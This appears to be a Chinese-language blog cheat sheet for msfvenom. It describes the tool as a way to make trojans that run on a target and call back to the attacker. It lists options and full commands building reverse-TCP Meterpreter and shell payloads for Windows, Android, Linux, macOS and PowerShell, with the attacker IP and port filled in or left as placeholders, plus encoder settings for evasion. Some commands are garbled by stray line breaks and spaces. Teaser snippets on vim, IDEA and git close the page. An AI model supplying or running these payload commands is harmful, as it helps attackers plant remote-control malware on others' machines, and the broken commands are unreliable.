msfvenom常見的使用命令

2022-05-04 06:09:10 字數 1619 閱讀 2388

原理:msfvenom是msfpayload、msfencode的結合體,利用msfvenom生成木馬程式,並在目標機上執行,在本地監聽上線

使用說明:

-p, --payload 使用指定的payload

-l, --list [module_type] 列出指定模組可用的payloads,包括payloads、encoders、nops、all

-n, --nopsled 為payload指定乙個 nopsled 長度

-f, --format 指定輸出格式,如exe等

-e, --encoder 使用編碼器

-a, --arch 指定payload構架(x86、x64)

--platform 指定payload平台

-s, --space 指定payload攻擊荷載的最大長度

-b, --bad-chars 指定規避字符集,如: '\x00\xff『

-i, --iterations 指定編碼次數

-c, --add-code 指定乙個附加的win32 shellcode 檔案

-x, --template 指定乙個可執行檔案作為模板

-k, --keep payload自動分離並注入到新的程序

-o, --out 儲存生成的payload

-v, --var-name 指定自定義變數

-h, --help 顯示幫助檔案

一、檢視msfvenom支援的payload    msfvenom --list payload

二、檢視msfvenom支援的平台         msfvenom --list platforms

三、檢視msfvenom支援的編碼格式  msfvenom --list encoders  其他的也是同理

使用metaspoilt生成木馬

msfvenom -a x64 --platform windows -p windows/meterpreter/reverse_tcp

lhost=192.168.30.133 lport=12345 - e x86/shikata_ga_nai -b '\x00\xff' -i 3 -f exe -o chen.exe

msfvenom -p android/meterpreter/reverse_tcp lhost= =《攻擊機ip> lport==《攻擊機埠》 -o

mm.apk

msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp lhost=《攻擊機ip>

lport=《攻擊機埠》 -

f elf -o payload.elf

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp lhost=《攻擊機ip> lport=《攻擊機

埠》 -f macho - o payload.macho

msfvenom -a x86 --platform windows -p windows/powershell_reverse_tcp lhost=《攻擊機ip>

lport=《攻擊機埠》 -e

cmd/powershell_base64 -i 3 -f raw -o payload.ps1

vim常見使用命令

一般模式 在linux終端中輸入 vim 檔名 就進入了一般模式,但不能輸入文字。命令模式 在一般模式下按 冒號 就會進入命令模式,左下角會有乙個冒號出現,此時可以敲入命令並執行 按esc可回到一般模式。vim filename 開啟或新建檔案,並將游標置於第一行首 vim n filename 開...

IDEA常見使用命令

1.f7 debug的時候,如果當前行是乙個方法,則進入當前方法體內。如果該方法體內還有方法,則不會進入內嵌的方法 2.f8 debug的時候,如果當前行是乙個方法,則不進入當前方法體內 3.f9 debug的時候,恢復程式執行,如果該斷點下邊的 還有斷點,則停到下乙個斷點上 4.alt f8 de...

git常見使用命令

2 檢視當前分支狀態 3 檢視當前有哪些分支 4 在工作區的第一次修改被放入暫存區,準備提交 5 暫存區的修改提交 6 推送到遠端倉庫 7 取回遠端主機某個分支的更新,再與本地的指定分支合併 8 從當前分支切換到 dev 分支 9 建立並切換新分支 拉取遠端分支到本地分支 本地不存在此分支 10 檢...